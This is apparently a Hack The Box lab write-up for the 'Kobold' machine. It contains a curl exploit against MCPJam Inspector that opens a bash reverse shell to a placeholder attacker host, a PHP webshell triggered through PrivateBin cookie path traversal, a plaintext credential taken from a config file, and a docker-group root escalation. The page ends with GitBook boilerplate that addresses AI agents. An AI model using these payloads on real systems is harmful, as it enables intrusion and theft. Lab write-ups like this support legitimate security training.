> For the complete documentation index, see [llms.txt](https://mux1337.gitbook.io/write-up-_/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://mux1337.gitbook.io/write-up-_/hack-the-box/machines/kobold.md).

# Kobold

<figure><img src="/files/HHv3YjZU68M9DO7oCFAB" alt=""><figcaption></figcaption></figure>

## HTB — Kobold Writeup

### Reconnaissance

#### Nmap

Scan revealed three open ports on the target:

* **22/tcp** — OpenSSH 9.6p1 (Ubuntu)
* **80/tcp** — nginx 1.24.0 (redirects to HTTPS)
* **443/tcp** — nginx 1.24.0 with SSL cert for `kobold.htb` and `*.kobold.htb`

Added to `/etc/hosts`:

```
<MACHINE_IP> kobold.htb mcp.kobold.htb bin.kobold.htb
```

#### VHost Fuzzing

```bash
ffuf -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-20000.txt \
  -u https://kobold.htb/ -H "Host: FUZZ.kobold.htb"
```

Discovered two subdomains:

* `mcp.kobold.htb` — MCPJam Inspector
* `bin.kobold.htb` — PrivateBin 2.0.2

***

### Initial Foothold — RCE via MCPJam Inspector (CVE-2026-23744)

MCPJam Inspector version ≤ 1.4.2 is vulnerable to unauthenticated RCE. The `/api/mcp/connect` endpoint accepts a `command` and `args` payload and executes it without authentication.

**Listener:**

```bash
rlwrap nc -lvnp 4444
```

**Exploit:**

```bash
curl -sk https://mcp.kobold.htb/api/mcp/connect \
  --header "Content-Type: application/json" \
  --data '{"serverConfig":{"command":"/bin/bash","args":["-c","bash -i >& /dev/tcp/<ATTACKER_IP>/4444 0>&1"],"env":{}},"serverId":"test"}'
```

Shell received as user `ben`.

***

### Internal Recon

```bash
ss -tlnp
```

Notable internal ports:

* `127.0.0.1:6274` — MCPJam node process
* `127.0.0.1:8080` — internal service
* `*:3552` — exposed on all interfaces (PrivateBin container)

***

### PrivateBin LFI/RCE (bin.kobold.htb)

#### Discovery

`bin.kobold.htb` runs PrivateBin 2.0.2, vulnerable to a template injection via cookie (CVE reported on privatebin.info).

#### Writing a Webshell

From the `ben` shell on the main host, the PrivateBin data directory was writable:

```bash
echo '<?php system($_GET["cmd"]); ?>' > /privatebin-data/data/shell.php
```

#### Triggering RCE via Template Cookie

```bash
curl -sk "https://bin.kobold.htb/?cmd=id" -H "Cookie: template=../data/shell"
```

#### Reading PrivateBin Config

```bash
curl -sk "https://bin.kobold.htb/?cmd=ls+/srv/cfg/" -H "Cookie: template=../data/shell"
curl -sk "https://bin.kobold.htb/?cmd=cat+/srv/cfg/conf.php" -H "Cookie: template=../data/shell"
```

**Credentials found:**

```ini
[model_options]
dsn = "mysql:host=localhost;dbname=privatebin;charset=UTF8"
usr = "privatebin"
pwd = "ComplexP@sswordAdmin1928"
```

***

### Privilege Escalation

#### Credential Reuse

The DB password reused as credentials for a local service on port 3552:

```
user: arcane
pass: ComplexP@sswordAdmin1928
```

#### Docker Group Escalation

Checked group memberships:

```bash
grep ben /etc/group
# operator:x:37:ben,alice
# ben:x:1001:

cat /etc/group | grep alice
# docker:x:111:alice
```

Note: `docker` group was not visible in the active session via `id` because the reverse shell did not inherit login session groups. `newgrp` re-reads `/etc/group` directly.

```bash
newgrp docker
```

#### Root Flag

```bash
docker run -v /:/hostfs --rm --user root --entrypoint cat \
  privatebin/nginx-fpm-alpine:2.0.2 /hostfs/root/root.txt
```

Root flag retrieved. ✓

***

### Summary

| Step           | Technique                                         |
| -------------- | ------------------------------------------------- |
| Initial access | CVE-2026-23744 — MCPJam unauthenticated RCE       |
| Lateral        | PrivateBin template injection webshell            |
| Creds          | Plaintext DB password in conf.php                 |
| Privesc        | Docker group via `newgrp` + host filesystem mount |

***

*Machine: Kobold — HackTheBox*


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://mux1337.gitbook.io/write-up-_/hack-the-box/machines/kobold.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.